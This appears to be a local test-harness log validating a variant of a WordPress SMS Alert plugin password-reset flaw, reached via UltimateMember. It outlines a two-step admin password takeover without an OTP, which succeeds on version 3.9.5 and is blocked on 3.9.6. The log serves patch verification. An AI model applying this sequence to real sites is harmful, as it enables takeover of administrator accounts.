============================================ CVE-2026-11387 VARIANT — UltimateMember entry point SMS Alert <= 3.9.5 (alt trigger) / 3.9.6 (fix coverage test) ============================================ Start: 2026-07-05T10:59:56Z [+] Environment OK (wp-cli, WordPress, MariaDB, plugin zips present) [+] WordPress + WooCommerce + UltimateMember ready [+] UM password-reset page ID=11 url=http://localhost:8072/?page_id=11 ============================================ PHASE A: UM variant against VULNERABLE 3.9.5 ============================================ [*] Setting up SMS Alert 3.9.5... [+] SMS Alert 3.9.5 configured (reset_password=on, buyer_signup_otp=on) [*] pre-exploit: orig pwd check -> OK [+] PHP server up on 8072 (PID=108873) [*] vuln Step 1: trigger UM password-reset for admin (session poison)... PHPSESSID=972a7d7d6ffc86b4f82d66a0c41e1a4e [*] vuln Step 2: submit smsalert-um-reset-pwd-action (no OTP)... HTTP HTTP/1.1 302 Found [*] post-exploit: new 'UmPwned!Pass42' -> OK (expected OK) [*] post-exploit: old 'admin_original_123' -> FAIL (expected FAIL) [+] VULNERABLE 3.9.5: UM variant SUCCEEDED ============================================ PHASE B: UM variant against PATCHED 3.9.6 ============================================ [*] Setting up SMS Alert 3.9.6... [+] SMS Alert 3.9.6 configured (reset_password=on, buyer_signup_otp=on) [*] pre-exploit: orig pwd check -> OK [+] PHP server up on 8072 (PID=108952) [*] fixed Step 1: trigger UM password-reset for admin (session poison)... PHPSESSID=2a193932ff0610e8690065797cd43dd5 [*] fixed Step 2: submit smsalert-um-reset-pwd-action (no OTP)... HTTP HTTP/1.1 200 OK [*] post-exploit: new 'UmHacked!Pass99' -> FAIL (expected FAIL) [*] post-exploit: old 'admin_original_123' -> OK (expected OK) [+] PATCHED 3.9.6: UM attack BLOCKED (NOT a bypass) [+] runtime_manifest.json written [+] validation_verdict.json written ============================================ FINAL VERDICT ============================================ UM variant reproduced on vulnerable 3.9.5 : true UM attack blocked on patched 3.9.6 : true End: 2026-07-05T11:00:28Z [+] Distinct alternate-trigger VARIANT confirmed; NOT a bypass (exit 1).